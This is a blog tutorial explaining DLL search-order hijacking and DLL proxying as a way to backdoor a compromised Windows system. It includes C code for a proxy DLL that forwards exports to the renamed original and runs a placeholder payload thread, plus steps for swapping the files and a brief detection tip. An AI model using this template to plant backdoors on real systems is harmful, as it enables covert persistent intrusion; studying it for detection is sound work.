Make DLL Trojan Proxy

Hi Guys,

I would like to share a basic concept of DLL Proxy which that has been a common way to create backdoor on the compromised system.

When the adversaries has been able to compromised a system then usually to enable them to have an easy access for future use with certain level of privilege on that system, the adversaries will look for non standard application that can be targeted to implant the backdoor. Why should be non standard application? one of the quick answer is to evade the endpoint detection.

DLL Search Order

As everyone should have known that the sequence of the DLL to be loaded to the main process will be follow this sequences

  1. Application Directory. (i.e. C:\Program Files\NewApplication)
  2. System Directory. (i.e. C:\Windows\System32)
  3. 16-bit System Directory. (i.e. C:\Windows\System)
  4. Windows Directory. (i.e. C:\Windows)
  5. Current Directory.
  6. Directories listed in the PATH variable.

When the adversaries has the privilege to manipulate configuration then it will make them even easier to implant the backdoor. This common technique is called DLL Search Order Hijacking

DLL Proxy Concept

The concept is to intercept the malware dll will ack as Legit DLL by having the same name and exports the same function as the original DLL. Whenever it intercept the call then it basically can manipulate the process. Below is the original C code DLL

#include "pch.h"

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

extern "C" __declspec(dllexport) VOID ExportedLeginFunction(int a)
{
    MessageBoxA(NULL, "ExportedLegitFunction has been called", "Legit DLL", 0);
}

from the above code that we can see the Legit DLL exports only one function ExportedLegitFunction that is available to be called from the application

when the legit DLL is called then it will show the messagebox like below

>rundll32.exe Legit.dll ExportedLegitFunction

In order to create the malware DLL we need to have a DLL that ack very similar to the Legit DLL and also export the same function ExportedLegitFunction . But in this case the malware DLL will not process the call but only forward it to the Legit DLL. Lets have a look below code

#include "pch.h"
#include <stdio.h>
#include <stdlib.h>

#define _CRT_SECURE_NO_DEPRECATE
#pragma warning (disable : 4996)

#pragma comment(linker, "/export:ExportedLegitFunction=LegitOriginal.ExportedLegitFunction,@1")


DWORD WINAPI DoMagic(LPVOID lpParameter)
{
    MessageBoxA(NULL, "A process in Malware DLL is run", "Malware DLL", 0);

    return 0;
}

BOOL APIENTRY DllMain(HMODULE hModule,
    DWORD ul_reason_for_call,
    LPVOID lpReserved
)
{
    HANDLE threadHandle;

    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        threadHandle = CreateThread(NULL, 0, DoMagic, NULL, 0, NULL);
        CloseHandle(threadHandle);

    case DLL_THREAD_ATTACH:
        break;
    case DLL_THREAD_DETACH:
        break;
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

The different is the way the malware DLL export the function is using Forward Exports

#pragma comment(linker, "/export:ExportedLegitFunction=LegitOriginal.ExportedLegitFunction,@1")

With the above forward code then when there is a call to ExportedLegitFunction then the call will be forwarded to LegitOriginal.ExportedLegitFunction

The Attack

The steps of the attack are below sequence

  1. Analyze the original DLL, from here referred to as “LegitOriginal DLL”
  2. Identify functions to intercept/modify
  3. Implement intercepted functions in Trojan DLL as
  4. Forward all other functions to the target DLL (the original DLL)
  5. Rename the target DLL
  6. Place Trojan DLL with original name of target DLL

Now lets try to run it again and lets see what is the different. Now when we call the Legit DLL that contain the malware it will run the payload and also forward the call to the original legit DLL

Conclusion

As we saw, DLL Proxying is made possible by a feature of the PE executable format known as Forward Exports. The Trojan DLL simply replaces the original, renaming the original DLL rather than deleting it, and forwarding to it all non-implemented functions.

Detection

The easiest one to identify the forward export from the DLL PE is the appearance of this kind of line in the exported function which show the function implementation is actually is not this DLL but in the LegitOriginal DLL file.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s